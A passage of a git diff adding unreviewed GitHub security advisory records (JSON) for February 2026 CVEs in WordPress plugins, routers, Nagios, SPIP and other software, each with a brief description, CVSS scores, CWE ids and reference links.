cb08bec5ecdad..bc18a59fea38a 100644 --- a/advisories/unreviewed/2026/02/GHSA-q5q3-fgwr-rr9h/GHSA-q5q3-fgwr-rr9h.json +++ b/advisories/unreviewed/2026/02/GHSA-q5q3-fgwr-rr9h/GHSA-q5q3-fgwr-rr9h.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-q5q3-fgwr-rr9h", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-17T18:32:55Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20621" ], "details": "The issue was addressed with improved memory handling. This issue is fixed in macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3. An app may be able to cause unexpected system termination or corrupt kernel memory.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -40,8 +45,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:05Z" diff --git a/advisories/unreviewed/2026/02/GHSA-q682-57gm-p99w/GHSA-q682-57gm-p99w.json b/advisories/unreviewed/2026/02/GHSA-q682-57gm-p99w/GHSA-q682-57gm-p99w.json new file mode 100644 index 0000000000000..8694d16cec456 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q682-57gm-p99w/GHSA-q682-57gm-p99w.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q682-57gm-p99w", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67994" + ], + "details": "Missing Authorization vulnerability in YayCommerce YayCurrency yaycurrency allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects YayCurrency: from n/a through <= 3.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67994" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/yaycurrency/vulnerability/wordpress-yaycurrency-plugin-3-3-arbitrary-content-deletion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q6h4-vchv-83f2/GHSA-q6h4-vchv-83f2.json b/advisories/unreviewed/2026/02/GHSA-q6h4-vchv-83f2/GHSA-q6h4-vchv-83f2.json new file mode 100644 index 0000000000000..c0cdab54f3e37 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q6h4-vchv-83f2/GHSA-q6h4-vchv-83f2.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q6h4-vchv-83f2", + "modified": "2026-02-19T18:31:51Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2026-2702" + ], + "details": "A security flaw has been discovered in Beetel 777VR1 up to 01.00.09. This issue affects some unknown processing of the component WPA2 PSK. Performing a manipulation results in hard-coded credentials. The attacker must have access to the local network to execute the attack. The complexity of an attack is rather high. The exploitability is assessed as difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2702" + }, + { + "type": "WEB", + "url": "https://gist.github.com/raghav20232023/a79c06d2d2562238a6c9d5e6229a13fa" + }, + { + "type": "WEB", + "url": "https://gist.github.com/raghav20232023/a79c06d2d2562238a6c9d5e6229a13fa#steps-to-reproduce" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346648" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346648" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754354" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-259" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q6xg-x4rx-4p97/GHSA-q6xg-x4rx-4p97.json b/advisories/unreviewed/2026/02/GHSA-q6xg-x4rx-4p97/GHSA-q6xg-x4rx-4p97.json new file mode 100644 index 0000000000000..1404ef75d3f44 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q6xg-x4rx-4p97/GHSA-q6xg-x4rx-4p97.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q6xg-x4rx-4p97", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68543" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Diza diza allows PHP Local File Inclusion.This issue affects Diza: from n/a through <= 1.3.15.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68543" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/diza/vulnerability/wordpress-diza-theme-1-3-15-local-file-inclusion-vulnerability-2?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q77w-wghg-55fv/GHSA-q77w-wghg-55fv.json b/advisories/unreviewed/2026/02/GHSA-q77w-wghg-55fv/GHSA-q77w-wghg-55fv.json new file mode 100644 index 0000000000000..524af1475ea00 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q77w-wghg-55fv/GHSA-q77w-wghg-55fv.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q77w-wghg-55fv", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2043" + ], + "details": "Nagios Host esensors_websensor_configwizard_func Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Nagios Host. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the esensors_websensor_configwizard_func method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-28249.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2043" + }, + { + "type": "WEB", + "url": "https://www.nagios.com/changelog/nagios-xi/nagios-xi-2026r1-0-1" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-072" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q7cc-x725-hp7g/GHSA-q7cc-x725-hp7g.json b/advisories/unreviewed/2026/02/GHSA-q7cc-x725-hp7g/GHSA-q7cc-x725-hp7g.json new file mode 100644 index 0000000000000..454dd1a293821 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q7cc-x725-hp7g/GHSA-q7cc-x725-hp7g.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q7cc-x725-hp7g", + "modified": "2026-02-18T09:31:03Z", + "published": "2026-02-18T09:31:03Z", + "aliases": [ + "CVE-2026-1807" + ], + "details": "The InteractiveCalculator for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'interactivecalculator' shortcode in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1807" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/interactivecalculator/tags/1.0.1/interactivecalculator.php#L44" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3456849%40interactivecalculator&new=3456849%40interactivecalculator&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3456870%40interactivecalculator&new=3456870%40interactivecalculator&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5c38f080-59c7-4201-9e87-87ee9ab6b97b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q7wp-4j7p-g4vj/GHSA-q7wp-4j7p-g4vj.json b/advisories/unreviewed/2026/02/GHSA-q7wp-4j7p-g4vj/GHSA-q7wp-4j7p-g4vj.json new file mode 100644 index 0000000000000..0c1f57574dbb5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q7wp-4j7p-g4vj/GHSA-q7wp-4j7p-g4vj.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q7wp-4j7p-g4vj", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2419" + ], + "details": "The WP-DownloadManager plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.69 via the 'download_path' configuration parameter. This is due to insufficient validation of the download path setting, which allows directory traversal sequences to bypass the WP_CONTENT_DIR prefix check. This makes it possible for authenticated attackers, with Administrator-level access and above, to configure the plugin to list and access arbitrary files on the server by exploiting the file browser functionality.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2419" + }, + { + "type": "WEB", + "url": "https://github.com/lesterchan/wp-downloadmanager/commit/416b9f5459496166c0395f9e055d4c4cf872404a" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-downloadmanager/tags/1.69/download-options.php#L42" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-downloadmanager/trunk/download-options.php#L42" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0bb96da1-9c17-4264-ac29-b5ff8dec745d?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T08:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q8fp-vccx-9w2h/GHSA-q8fp-vccx-9w2h.json b/advisories/unreviewed/2026/02/GHSA-q8fp-vccx-9w2h/GHSA-q8fp-vccx-9w2h.json new file mode 100644 index 0000000000000..fb41a34cbaba9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q8fp-vccx-9w2h/GHSA-q8fp-vccx-9w2h.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q8fp-vccx-9w2h", + "modified": "2026-02-21T00:31:43Z", + "published": "2026-02-21T00:31:43Z", + "aliases": [ + "CVE-2026-2039" + ], + "details": "GFI Archiver MArc.Store Missing Authorization Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of GFI Archiver. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the configuration of the MArc.Store.Remoting.exe process, which listens on port 8018. The issue results from the lack of authorization prior to allowing access to functionality. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of SYSTEM. Was ZDI-CAN-28597.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2039" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-26-077" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T23:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q8m6-hjhf-m246/GHSA-q8m6-hjhf-m246.json b/advisories/unreviewed/2026/02/GHSA-q8m6-hjhf-m246/GHSA-q8m6-hjhf-m246.json new file mode 100644 index 0000000000000..712d15e9fdcbd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q8m6-hjhf-m246/GHSA-q8m6-hjhf-m246.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q8m6-hjhf-m246", + "modified": "2026-02-20T18:31:32Z", + "published": "2026-02-19T21:30:48Z", + "aliases": [ + "CVE-2026-27343" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in VanKarWai Airtifact airtifact allows PHP Local File Inclusion.This issue affects Airtifact: from n/a through <= 1.2.91.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27343" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/airtifact/vulnerability/wordpress-airtifact-theme-1-2-91-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T21:18:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q8wg-gw6g-8c93/GHSA-q8wg-gw6g-8c93.json b/advisories/unreviewed/2026/02/GHSA-q8wg-gw6g-8c93/GHSA-q8wg-gw6g-8c93.json new file mode 100644 index 0000000000000..692cea57e14ed --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q8wg-gw6g-8c93/GHSA-q8wg-gw6g-8c93.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q8wg-gw6g-8c93", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2025-70833" + ], + "details": "An Authentication Bypass vulnerability in Smanga 3.2.7 allows an unauthenticated attacker to reset the password of any user (including the administrator) and fully takeover the account by manipulating POST parameters. The issue stems from insecure permission validation in check-power.php.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70833" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve/issues/4" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qc7g-qpr2-qpjj/GHSA-qc7g-qpr2-qpjj.json b/advisories/unreviewed/2026/02/GHSA-qc7g-qpr2-qpjj/GHSA-qc7g-qpr2-qpjj.json new file mode 100644 index 0000000000000..60dcf969ccebe --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qc7g-qpr2-qpjj/GHSA-qc7g-qpr2-qpjj.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qc7g-qpr2-qpjj", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-33130" + ], + "details": "IBM DB2 Merge Backup for Linux, UNIX and Windows 12.1.0.0 could allow an authenticated user to cause the program to crash due to a buffer being overwritten when it is allocated on the stack.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33130" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260043" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qc95-pwfh-96qq/GHSA-qc95-pwfh-96qq.json b/advisories/unreviewed/2026/02/GHSA-qc95-pwfh-96qq/GHSA-qc95-pwfh-96qq.json new file mode 100644 index 0000000000000..a66774b0e4ce1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qc95-pwfh-96qq/GHSA-qc95-pwfh-96qq.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qc95-pwfh-96qq", + "modified": "2026-02-19T18:31:49Z", + "published": "2026-02-19T18:31:49Z", + "aliases": [ + "CVE-2025-12375" + ], + "details": "The Printful Integration for WooCommerce plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.2.11 via the advanced size chart REST API endpoint. This is due to insufficient validation of user-supplied URLs before passing them to the download_url() function. This makes it possible for authenticated attackers, with Contributor-level access and above, to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12375" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/printful-shipping-for-woocommerce/tags/2.2.11/includes/class-printful-rest-api-controller.php#L259" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/printful-shipping-for-woocommerce/tags/2.2.11/includes/class-printful-rest-api-controller.php#L67" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/printful-shipping-for-woocommerce/tags/2.2.11/includes/class-printful-size-guide.php#L170" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/printful-shipping-for-woocommerce/tags/2.2.11/includes/class-printful-size-guide.php#L210" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3439592%40printful-shipping-for-woocommerce&new=3439592%40printful-shipping-for-woocommerce&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4cb410aa-3941-4e19-8de4-622a94766ee8?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qcw5-f875-rfvw/GHSA-qcw5-f875-rfvw.json b/advisories/unreviewed/2026/02/GHSA-qcw5-f875-rfvw/GHSA-qcw5-f875-rfvw.json new file mode 100644 index 0000000000000..d576b2d32c852 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qcw5-f875-rfvw/GHSA-qcw5-f875-rfvw.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qcw5-f875-rfvw", + "modified": "2026-02-17T15:31:35Z", + "published": "2026-02-17T15:31:35Z", + "aliases": [ + "CVE-2022-41650" + ], + "details": "Missing Authorization vulnerability in Paul Custom Content by Country (by Shield Security) custom-content-by-country.This issue affects Custom Content by Country (by Shield Security): from n/a through 3.1.2.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41650" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/wordpress/plugin/custom-content-by-country/vulnerability/wordpress-custom-content-by-country-plugin-3-1-2-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T15:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qf2x-h525-fc86/GHSA-qf2x-h525-fc86.json b/advisories/unreviewed/2026/02/GHSA-qf2x-h525-fc86/GHSA-qf2x-h525-fc86.json new file mode 100644 index 0000000000000..4f872e4d5694e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qf2x-h525-fc86/GHSA-qf2x-h525-fc86.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qf2x-h525-fc86", + "modified": "2026-02-22T06:30:16Z", + "published": "2026-02-22T06:30:16Z", + "aliases": [ + "CVE-2026-2911" + ], + "details": "A vulnerability has been found in Tenda FH451 up to 1.0.0.9. This issue affects some unknown processing of the file /goform/GstDhcpSetSer. The manipulation leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2911" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347220" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347220" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755218" + }, + { + "type": "WEB", + "url": "https://vuln.ricky.place/Tenda/FH451" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T04:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qfch-9m87-pgm2/GHSA-qfch-9m87-pgm2.json b/advisories/unreviewed/2026/02/GHSA-qfch-9m87-pgm2/GHSA-qfch-9m87-pgm2.json new file mode 100644 index 0000000000000..f9f4f8ef193ed --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qfch-9m87-pgm2/GHSA-qfch-9m87-pgm2.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qfch-9m87-pgm2", + "modified": "2026-02-19T18:31:54Z", + "published": "2026-02-19T18:31:54Z", + "aliases": [ + "CVE-2025-71250" + ], + "details": "SPIP before 4.4.9 allows Insecure Deserialization in the public area through the table_valeur filter and the DATA iterator, which accept serialized data. An attacker who can place malicious serialized content (a pre-condition requiring prior access or another vulnerability) can trigger arbitrary object instantiation and potentially achieve code execution. The use of serialized data in these components has been deprecated and will be removed in SPIP 5. This vulnerability is not mitigated by the SPIP security screen.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71250" + }, + { + "type": "WEB", + "url": "https://blog.spip.net/Mise-a-jour-de-securite-sortie-de-SPIP-4-4-9.html" + }, + { + "type": "WEB", + "url": "https://git.spip.net/spip/spip" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/spip-insecure-deserialization" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T16:27:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qfwf-756h-2p4g/GHSA-qfwf-756h-2p4g.json b/advisories/unreviewed/2026/02/GHSA-qfwf-756h-2p4g/GHSA-qfwf-756h-2p4g.json new file mode 100644 index 0000000000000..8b9223e1a7b48 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qfwf-756h-2p4g/GHSA-qfwf-756h-2p4g.json @@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qfwf-756h-2p4g", + "modified": "2026-02-18T09:31:04Z", + "published": "2026-02-18T09:31:04Z", + "aliases": [ + "CVE-2026-2644" + ], + "details": "A weakness has been identified in niklasso minisat up to 2.2.0. This issue affects the function Solver::value in the library core/SolverTypes.h of the component DIMACS File Parser. This manipulation of the argument variable index with the input 2147483648 causes out-of-bounds read. The attack needs to be launched locally. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2644" + }, + { + "type": "WEB", + "url": "https://github.com/niklasso/minisat/issues/55" + }, + { + "type": "WEB", + "url": "https://github.com/niklasso/minisat/issues/55#issue-3832527387" + }, + { + "type": "WEB", + "url": "https://github.com/niklasso/minisat" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346406" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346406" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752775" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119", + "CWE-787" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T07:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qj2h-hx88-46hp/GHSA-qj2h-hx88-46hp.json b/advisories/unreviewed/2026/02/GHSA-qj2h-hx88-46hp/GHSA-qj2h-hx88-46hp.json new file mode 100644 index 0000000000000..e03291f779f03 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qj2h-hx88-46hp/GHSA-qj2h-hx88-46hp.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qj2h-hx88-46hp", + "modified": "2026-02-21T09:33:57Z", + "published": "2026-02-21T09:33:57Z", + "aliases": [ + "CVE-2026-2864" + ], + "details": "A vulnerability has been found in feng_ha_ha/megagao ssm-erp and production_ssm up to 4288d53bd35757b27f2d070057aefb2c07bdd097. This affects the function pictureDelete of the file PictureController.java. Such manipulation of the argument picName leads to path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. This product is distributed under two entirely different names. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" + }, + { + 